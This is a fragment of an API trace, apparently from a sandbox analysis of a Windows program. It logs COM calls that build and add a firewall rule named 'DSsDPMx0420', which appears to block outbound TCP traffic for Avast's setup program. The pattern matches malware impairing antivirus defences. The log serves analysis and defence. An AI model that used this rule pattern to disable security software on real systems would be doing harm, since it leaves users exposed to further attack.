wReserved2=0x43b0, wReserved3=0x2a, varVal1="DSsDPMx0420", varVal2=0x6c4c1684)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1="DSsDPMx0420", varVal2=0x6c4c1684)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.755] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.765] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.765] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Description", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=2) returned 0x0 [0228.765] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.765] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.765] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=2, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0xd29, wReserved2=0xd0a, wReserved3=0xd0a, varVal1="regra para ", varVal2=0x4148436b)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0xd29, wReserved2=0xd0a, wReserved3=0xd0a, varVal1="regra para ", varVal2=0x4148436b)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.766] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.766] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.766] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Applicationname", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=3) returned 0x0 [0228.766] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.766] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.766] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=3, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1="C:\\Program Files\\AVAST Software\\Avast\\Setup\\avast.setup", varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1="C:\\Program Files\\AVAST Software\\Avast\\Setup\\avast.setup", varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.766] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.766] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.766] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Protocol", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=5) returned 0x0 [0228.767] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.767] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.767] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=5, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x2a0006, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x2a0006, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.767] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.767] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.767] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="LocalPorts", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=6) returned 0x0 [0228.767] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.767] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.767] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=6, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x0, wReserved1=0x187, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x0, wReserved1=0x187, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.767] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.767] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.768] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="RemotePorts", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=7) returned 0x0 [0228.768] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.768] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.768] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=7, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x0, wReserved1=0x187, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x0, wReserved1=0x187, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.768] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.768] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.768] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="enabled", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=14) returned 0x0 [0228.768] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.768] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.768] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=14, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0xb, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x187ffff, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0xb, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x187ffff, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.768] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.827] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.827] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Grouping", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=15) returned 0x0 [0228.827] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.827] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.827] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=15, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1="@firewallapi.dll,-23255", varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x25e968*(varType=0x8, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1="@firewallapi.dll,-23255", varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.827] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.827] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.827] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Profiles", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=16) returned 0x0 [0228.828] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.828] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.828] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=16, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x3, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fffffff, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x3, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fffffff, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.828] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.828] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.828] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Action", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=18) returned 0x0 [0228.828] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.828] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.828] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=18, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fff0000, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fff0000, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.828] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.829] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.829] IDispatch:GetIDsOfNames (in: This=0x1876f90, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Direction", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=11) returned 0x0 [0228.829] IUnknown:AddRef (This=0x1876f90) returned 0x2 [0228.829] IUnknown:QueryInterface (in: This=0x1876f90, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.829] IDispatch:Invoke (in: This=0x1876f90, dispIdMember=11, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fff0002, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d38*(varType=0x2, wReserved1=0x0, wReserved2=0x43b0, wReserved3=0x2a, varVal1=0x7fff0002, varVal2=0x6c4c18bb)), rgdispidNamedArgs=([0]=0x25ea28*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x1876f90) returned 0x0 [0228.829] IUnknown:Release (This=0x1876f90) returned 0x1 [0228.829] IUnknown:QueryInterface (in: This=0x187cec0, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea58 | out: ppvObject=0x25ea58*=0x0) returned 0x80004002 [0228.829] IDispatch:GetIDsOfNames (in: This=0x187cec0, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x25ea5c*="Add", cNames=0x1, lcid=0x409, rgDispId=0x25ea74 | out: rgDispId=0x25ea74*=2) returned 0x0 [0228.829] IUnknown:AddRef (This=0x187cec0) returned 0x3 [0228.829] IUnknown:QueryInterface (in: This=0x187cec0, riid=0x6c4c19c4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x25ea60 | out: ppvObject=0x25ea60*=0x0) returned 0x80004002 [0228.829] IDispatch:Invoke (in: This=0x187cec0, dispIdMember=2, riid=0x6c4c190c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d28*(varType=0x400c, wReserved1=0x25, wReserved2=0x3db8, wReserved3=0x2a, varVal1=0x2a3d68*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1876f90, varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x25ea08, puArgErr=0x25ea4c | out: pDispParams=0x25ea2c*(rgvarg=([0]=0x2a3d28*(varType=0x400c, wReserved1=0x25, wReserved2=0x3db8, wReserved3=0x2a, varVal1=0x2a3d68*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1876f90, varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x25ea08*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x25ea4c*=0x187cec0) returned 0x0 [0228.861] IUnknown:Release (This=0x187cec0) returned 0x2 [0228.904] 